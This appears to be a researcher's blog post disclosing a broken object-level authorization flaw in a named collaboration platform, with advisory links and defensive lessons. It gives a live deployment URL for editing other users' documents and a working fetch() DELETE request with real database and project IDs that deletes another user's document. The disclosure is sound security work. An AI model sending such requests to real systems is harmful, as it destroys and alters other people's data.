From View to Destroy: Exploiting BOLA for Full Cross-User Document Compromise

Broken Object Level Authorization (BOLA) enables cross-user document viewing, modification, and unauthorized deletion via direct object…

Aditya Bhatt

MeetCyber

· ~2 min read · March 6, 2026 (Updated: March 6, 2026) · Free: Yes

Broken Object Level Authorization (BOLA) enables cross-user document viewing, modification, and unauthorized deletion via direct object reference.

Public Advisories

GHSA-gj3h-wcpc-5pw7
GHSA-m56q-pj22–83xq

Official Advisory Links:

https://github.com/karnop/realtime-collaboration-platform/security/advisories/GHSA-gj3h-wcpc-5pw7 https://github.com/karnop/realtime-collaboration-platform/security/advisories/GHSA-m56q-pj22-83xq

The Core Issue

The platform relied on document IDs as direct object references.

Ownership permissions existed.

Authorization enforcement did not.

That gap enabled:

Unauthorized viewing
Live modification
Permanent deletion

Across users.

Phase 1 — Viewing & Modifying Other Users' Documents

An attacker:

Creates Account B
Obtains a valid Document ID
Navigates directly to:

/documents/{DocumentID}

The document loads.

Real-time editing works.

Changes persist.

Delete is restricted — update is not.

Confidentiality and integrity are broken.

🔥 PoC — Live Modification

Navigate directly:

https://realtime-collaboration-platform-steel.vercel.app/documents/{DocumentID}

Modify content.

Observe real-time synchronization.

Phase 2 — Unauthorized Deletion

Deletion is not enforced server-side.

fetch("https://cloud.appwrite.io/v1/databases/6981d87b002e1c8dbc0d/collections/documents/documents/69981f2500182f323cd2", {
  method: "DELETE",
  credentials: "include",
  headers: {
    "X-Appwrite-Project": "6981d34b0036b9515a07"
  }
});

Result:

HTTP 204 returned
Document permanently deleted
Owner loses access

Availability now compromised.

Why This Matters

This is not a minor access control oversight.

This is full horizontal privilege escalation:

Cross-user read
Cross-user write
Cross-user destructive delete

This aligns with:

OWASP API1: Broken Object Level Authorization
MITRE CWE-639

Security Lessons

Never trust object identifiers alone
Always enforce authorization server-side
Validate ownership on every state-changing request
Metadata permissions mean nothing without backend enforcement

⭐ Follow Me & Connect

🔗 GitHub: https://github.com/AdityaBhatt3010 💼 LinkedIn: https://www.linkedin.com/in/adityabhatt3010/ ✍️ Medium: https://medium.com/@adityabhatt3010 👨‍💻 PoC Repository: https://github.com/AdityaBhatt3010/Horizontal-Privilege-Escalation-via-BOLA-Broken-Object-Level-Authorization

#privilege-escalation #bola #ghsa #exploit #cybersecurity